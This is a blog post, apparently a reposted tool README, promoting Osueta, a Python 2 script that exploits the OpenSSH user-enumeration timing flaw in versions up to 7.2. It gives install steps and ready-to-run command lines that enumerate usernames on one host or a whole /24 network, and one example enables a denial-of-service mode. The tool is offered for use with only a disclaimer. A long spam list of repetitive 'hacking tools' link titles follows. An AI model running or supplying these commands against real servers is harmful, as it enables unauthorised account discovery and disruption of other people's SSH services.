Sunday, August 23, 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


Related posts


  1. Pentest Tools Website
  2. Ethical Hacker Tools
  3. Hack Tools Online
  4. Bluetooth Hacking Tools Kali
  5. Pentest Tools Port Scanner
  6. Hak5 Tools
  7. Hacking Tools For Windows Free Download
  8. Pentest Tools For Ubuntu
  9. Hacking Tools And Software
  10. Hacking Tools Kit
  11. Hacking Tools Download
  12. Hacking Tools And Software
  13. Hacker Tools
  14. Tools Used For Hacking
  15. Hacker Tools Software
  16. Hacker Tools Free
  17. Hacker
  18. How To Hack
  19. Hack Tools Mac
  20. Nsa Hacker Tools
  21. Hack And Tools
  22. Install Pentest Tools Ubuntu
  23. Hacking Tools Mac
  24. Hacking Tools For Beginners
  25. Hacker Tools Windows
  26. Hacker Tools 2020
  27. Hacking Tools Online
  28. New Hacker Tools
  29. Pentest Tools Kali Linux
  30. Hacking Tools Hardware
  31. Pentest Tools Review
  32. Hacker Tools
  33. Easy Hack Tools
  34. Hacker Tools 2019
  35. How To Install Pentest Tools In Ubuntu
  36. Pentest Tools Windows
  37. Hacking Tools For Kali Linux
  38. Hack Tools For Games
  39. Physical Pentest Tools
  40. What Is Hacking Tools
  41. Computer Hacker
  42. Pentest Tools Alternative
  43. Hacker Techniques Tools And Incident Handling
  44. Hak5 Tools
  45. Pentest Tools For Mac
  46. Hacking Tools For Windows 7
  47. Pentest Tools Free
  48. Hack Tools For Mac
  49. Hack Tools For Ubuntu
  50. Hacker Tools For Windows
  51. Underground Hacker Sites
  52. Hack Tools For Games
  53. Free Pentest Tools For Windows
  54. Hacking Tools
  55. Hack Tools For Pc
  56. Pentest Tools Open Source
  57. Hacking Tools And Software
  58. Hacking Tools Github
  59. Hacking Tools Usb
  60. Pentest Tools Review
  61. Top Pentest Tools
  62. Hacker Tools Online
  63. Pentest Tools Subdomain
  64. Hacker Tools 2020
  65. Hak5 Tools
  66. How To Hack
  67. Tools Used For Hacking
  68. Hacking Tools 2020
  69. Install Pentest Tools Ubuntu
  70. Hack Website Online Tool
  71. Nsa Hacker Tools
  72. Hack Tools For Windows
  73. Hacker Tools Free Download
  74. Pentest Tools Download
  75. Hacking Tools For Games
  76. Hacking Tools For Windows
  77. Hack Tools Mac
  78. Hacking Apps
  79. Hacker Tools Mac
  80. Hack Website Online Tool
  81. Hacking Tools Windows 10
  82. Hacking Tools And Software
  83. Hack Tools Pc
  84. Nsa Hack Tools Download
  85. Hacker Tools Apk Download
  86. Hacker Tools Free Download
  87. Hacking Tools Windows 10
  88. Hacking Tools Download
  89. Ethical Hacker Tools
  90. Game Hacking
  91. Hack Tools Github
  92. Nsa Hack Tools
  93. Hacker Tools For Windows
  94. Hacker Tools Software
  95. Pentest Tools Kali Linux

No comments:

Post a Comment